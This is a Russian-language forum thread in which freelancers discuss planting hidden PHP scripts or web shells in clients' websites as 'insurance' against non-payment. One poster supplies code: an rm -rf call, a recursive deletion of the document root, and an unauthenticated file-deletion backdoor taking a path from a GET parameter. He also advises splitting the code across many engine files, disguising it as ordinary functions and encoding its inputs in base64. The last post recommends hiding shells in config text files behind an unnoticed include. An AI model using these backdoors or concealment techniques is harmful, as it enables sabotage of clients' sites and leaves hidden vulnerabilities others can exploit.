Файл (скрипт) - "страховка для фриласера"

[D'Jack]

Добрый день!

Один знакомый рассказывал, о том что опытные фрилансеры пользуются след. схемой подстраховки когда работают с незнакомым заказчиком и сомневаются в том, что их труд будет оплачен в оговоренных объёмах и сроках:

Есть некий скриптик .php работа, которого заключается в том что бы удалить всё что находится на FTP сервере и какой то кусок sql базы, говоря другими словами если заказчик не заплатил удалённому исполнителю, предварительно поменяв все пароли которыми пользовался исполнитель в своей работе с сайтом, то фрилансер с любого компьютера заходит на сайт и запускает предварительно припрятаны им скриптик.

Для просмотра ссылки Войди или Зарегистрируйся

Друзья, если у кого то есть пример скрипта буду очень признателен если поделитесь.

 

[Горбушка]

Для этого обычно используются либо самописные скрипты, у каждого свои... Либо обычный вебшел.
Делиться - в гугле полно готового. Да и нет 100% готового, ибо в БД всё равно лесть руками, да и пароли надо с разных конфигов по разному брать...

 

[demolg]

Добрый день!

Один знакомый рассказывал, о том что опытные фрилансеры пользуются след. схемой подстраховки когда работают с незнакомым заказчиком и сомневаются в том, что их труд будет оплачен в оговоренных объёмах и сроках:

Есть некий скриптик .php работа, которого заключается в том что бы удалить всё что находится на FTP сервере и какой то кусок sql базы, говоря другими словами если заказчик не заплатил удалённому исполнителю, предварительно поменяв все пароли которыми пользовался исполнитель в своей работе с сайтом, то фрилансер с любого компьютера заходит на сайт и запускает предварительно припрятаны им скриптик.

Для просмотра ссылки Войди или Зарегистрируйся

Друзья, если у кого то есть пример скрипта буду очень признателен если поделитесь.

это обыкновенный phpшелл. подробнее: Для просмотра ссылки Войди или Зарегистрируйся

 

[D'Jack]

Для этого обычно используются либо самописные скрипты, у каждого свои... Либо обычный вебшел.
Делиться - в гугле полно готового. Да и нет 100% готового, ибо в БД всё равно лесть руками, да и пароли надо с разных конфигов по разному брать...

а если говорить исключительно об удалении файлов с ftp есть пример рабочий который можно взять на вооружение

 

[Горбушка]

<?php
exec('rm -rf');
?>

А так, говорю же, в гугле полно готового:

<?php
function removeDir($path) {
    if (is_file($path)) {
      @unlink($path);
    } else {
        array_map('removeDir',glob('/*')) == @rmdir($path);
    }
    @rmdir($path);
}
?>
$path = $_SERVER['DOCUMENT_ROOT'];
removeDir($path);

Осталось добавить проверку пароля и готово. Все файлы будут снесены. Причём не только внутри домена, но и выше - до корня юзера. Жестоко, зато 10 строк кода. Можно добавить другие пути, ограничения и т.д.

Если надо удалить конкретный файл, да и в целях "мелкий пакостник" (Раз в сутки удаляем произвольный файлик

<?php

$file = $_GET['file'];
unlink($file);

?>
Пихаем в какой-нибудь системный файл, где в жизни не заметят и готово. Добавляем к домену ?file=/vae/www/domain/index.php и вуаля, файлика нет.

Конечно, коды в таком виде никто не оставляет. Их распихивают по 20-30 файлам движка так, чтобы выглядели безобидными и нужными функциями... К примеру сам unlink пихается в менеджер файлов, где он вполне имеет место быть, а переменную, которая принимает удаляемый файл запихиваем ещё куда-нибудь. Данные передаём в каком-нибудь base64, но лучше в ещё более редких штуках... Ну это больше для параноиков. А как оплатил - удаляем все упоминания о себе и забываем о клиенте =)

 

[Anton_Fadeev]

Как-то доделывал интернет-магазин после предыдущего вебмастера. Причем он был хитрый - домен заказчика оформил на себя и хостинг тоже. Пароли скинул только ftp и mysql, т.е. зайти в админку хостинга и поменять все пароли я не мог. Как позже выяснилось - мой заказчик поругался с тем вебмастером. И первое время я за#@!ся удалять вирусы с сайта, которые, как я потом понял, заливал тот вебмастер. Не знаю кто кого кинул, но через год, когда сайт был раскручен и надо было продлевать домен - вебмастер запросил за него N-ную сумму денег, и заказчику пришлось заплатить.
Я это к тому, что в основном страдал от этого не заказчик, а я, время от времени обнаруживая вредоносный код и кривоработающий сайт. Т.е. я тогда не знал как туда попадают вирусы и ночами сидел чистил все это чтобы заказчик не видел и не подумал что я ему сайт вирусами заразил. Меня тоже пытались кинуть и я тоже всячески подстраховывался. Но бывают и фрилансеры недобросовестные. Знаю пару случаев когда делали откровенную йухню, но оценивали свою работу так, будто им Папа Римский помогал. Когда ставят бесплатный движок, вешают на него бесплатный из паблика шаблон, ничего не настроив в движке и протянув резину 7 месяцев берут деньги как за уникальный сайт - по моему идет кидалово со стороны фрилансера. У меня знакомый на таких попал - я когда узнал, хотел просто в глаза посмотреть этим "программистам".
Обычно я все регистрирую на заказчика (на новый почт. ящик) и потом передаю его заказчику, чтобы не парится с перерегистрацией и т.д. Потом подстраховываюсь оплатой - выполнил 30-50% - показал, получил деньги, приступил к оставшейся части. Нанести вред сайту можно и без доступа к файлам - например портить репутацию в сети и сужать трафик. Сам задумывался о лазейке - если кинули - грохнуть то что делал (можно с бекапом чтоб если одумаются можно было все вернуть), если все хорошо - чтобы скрипт сам себя удалил. А то такие шеллы, особенно из паблика очень опасны. Вам заплатили, все хорошо, а потом кто-нибудь случайно или из злого умысла воспользуется оставленными после вас дырами.

А, вспомнил - хотел не просто грохнуть сайт, а чтобы появлялась табличка типа (если владелец сайта обманывает своих работников, то и клиентов он тоже кинет) или (сайт отключен за неоплату услуг фрилансера) =)

 

[Горбушка]

Я это к тому, что в основном страдал от этого не заказчик, а я

Ты за это деньги и получал... Ну а если ты за это не выставлял счёт - то это уже твоя вина, что делал что-то за пределами ТЗ.

А, вспомнил - хотел не просто грохнуть сайт, а чтобы появлялась табличка типа (если владелец сайта обманывает своих работников, то и клиентов он тоже кинет) или (сайт отключен за неоплату услуг фрилансера) =)

Обычный шелл заливай и всё.. Правь любой файлик, который хочешь...

 

[Anton_Fadeev]

Ты за это деньги и получал... Ну а если ты за это не выставлял счёт - то это уже твоя вина, что делал что-то за пределами ТЗ.
Обычный шелл заливай и всё.. Правь любой файлик, который хочешь...

А вы пробовали доказать заказчику, что вирус попал туда не по вашей вине? Тем более если речь идет о недобросовестных заказчиках. Он скажет что мол, до того как ты взялся за работу все было ок, а ты что-то сделал и теперь на сайте вирусы.

 

[Горбушка]

А вы пробовали доказать заказчику, что вирус попал туда не по вашей вине? Тем более если речь идет о недобросовестных заказчиках. Он скажет что мол, до того как ты взялся за работу все было ок, а ты что-то сделал и теперь на сайте вирусы.

Пробовал и спокойно доказывал. Для этого есть логи FTP и HTTP серверов, к которым и ты, и заказчик имеете доступ только на чтение и удаление, но никак не на редактирование.

Кроме того, надо изначально поставить заказчика на место - мы работает только по Вашему ТЗ, всё, что к нему не относится (уязвимости и прочее) мы не трогаем. При возникновении споров - сразу носом в логи ("я эти файлы не трогал, это уязвимость Вашего сайта").

P.s. вечером под ДЛЕ выложу такую страховочку =)

 

[Denixxx]

Вообще идея параноидальна по самой сути.
Я работаю так.
1. Предоплата.
2. Изготовление сайта на своем домене.
Проверяем, задаём вопросы.
Не понравилось, или денег нет, или он кинуть хотел — разбежались, предоплата не возвращается.
Или — идем к п. 3.
3. Перечисляется остаток денег и скрипт отдается Заказчику.
Либо он дает ФТП доступ, либо я даю файлик, автоматически устанавливающий сайт на его домен, либо ссылку на архив сайта — устанавливает сам (такой параноик один раз попался, из фирмы занимающейся безопасностью).

Все остальное плохо работает. Шеллы — так он скорее из принципа найдет кого-то, кто их найдет скриптами, чем заплатит Вам то что должен.

После того как перешел на такой принцип, за 3 года всего 2 раза не дошло до п. 3. Ещё — 30% Заказчиков отваливаются до предоплаты. По статистике, среди таких ранее было 80% кидал. Что интересно, когда работаешь совсем без предоплаты — со временем постоянные клиенты набираются наглости и начинаю потихоньку садиться на шею, даже до кидалова доходит.

Так что совет: без предоплаты не работайте, вообще. Либо 100% бесплатно, если просто процесс интересен — но тогда это не работа, а хобби

Предоплата — настоящая страховка для фрилансера!


Зы. А уж если занимаетесь шеллами — прячьте их в текстовые файлы в папке с конфигами, и делайте незаметный инклюд.